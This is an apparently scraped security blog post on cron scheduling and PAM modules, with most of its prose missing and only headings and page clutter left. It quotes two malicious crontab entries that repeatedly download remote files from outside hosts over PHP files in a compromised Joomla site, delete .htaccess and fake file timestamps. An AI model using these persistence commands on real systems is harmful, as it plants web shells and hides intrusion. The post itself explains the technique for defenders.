The power of cron

Using the crontab command

Who can use this command?

Scheduling jobs

cron vs. anacron

No, not the artist!

What does cron have to do with security?

About PAM

Another PAM
  • account modules check that the specified account is a valid authentication target under current conditions. This may include conditions like account expiration, time of day, and that the user has access to the requested service.
  • authentication modules verify the user’s identity, for example by requesting and checking a password or other secret. They may also pass authentication information on to other systems like a keyring.
  • password modules are responsible for updating passwords and are generally coupled to modules employed in the authentication step. They may also be used to enforce strong passwords.
  • session modules define actions that are performed at the beginning and end of sessions. A session starts after the user has successfully authenticated.
The account tab will be set to “required” by default.
Change the account tab to “sufficient” as seen here.
From Xiaodong Lin, Introductory Computer Forensics: A Hands-on Practical Approach, Springer, 2018, p. 310.

How a malicious actor could use cron to establish persistence

*/3 * * * * chmod 0755 /home3/infectedsite/public_html/libraries/joomla/utilities/compat/compat.php; wget http://  www.xxx  .com/wdc.txt -O /home3/infectedsite/public_html/libraries/joomla/utilities/compat/compat.php >/dev/null; 
* */6 * * * wget http:// www.xxx .com/PDF/rbkvgqdyle.txt -O /home3/infectedsite/public_html/libraries/simplepie/idn/7cuyng9o1a.php >/dev/null; fetch -o /home3/infectedsite/public_html/libraries/simplepie/idn/7cuyng9o1a.php http:// www.hestonsflorist .com/PDF/rbkvgqdyle.txt >/dev/null 2>&1; touch -t 201104202045 /home3/infectedsite/public_html/libraries/simplepie/idn/index.html >/dev/null; chmod 0755 /home3/infectedsite/public_html/libraries/simplepie/idn/.htaccess >/dev/null; rm /home3/infectedsite/public_html/libraries/simplepie/idn/.htaccess >/dev/null; touch -t 201104202045 /home3/infectedsite/public_html/libraries/simplepie/idn/.; touch -t 201104202045 /home3/infectedsite/public_html/libraries/simplepie/idn/7cuyng9o1a.php >/dev/null

--

--

--

A variety of topics related to the information security (infosec) field

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

【Application(10)】Pairs Trading

How can I choose a mobile application development company In the US?

mobile application development company

OverTheWire: Bandit Level 27 → Level 28

How to Configure Lunch Module in Odoo V15

How to Run a Successful Tech Meetup — even if you’re forgetful

New post on The Gate’s Fanpage.

Monitoring Corda Nodes With Splunk

Managing data with Elastic

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Alex Myers Security Engineer

Alex Myers Security Engineer

A variety of topics related to the information security (infosec) field

More from Medium

Massive Resources, Learning Paths, and Collection for DevSecOps

Linux Fundamental Part 1 | TryHackMe

Cron Jobs to Delete Files after ‘X’ days

Using Linux Run Levels for VM termination tasks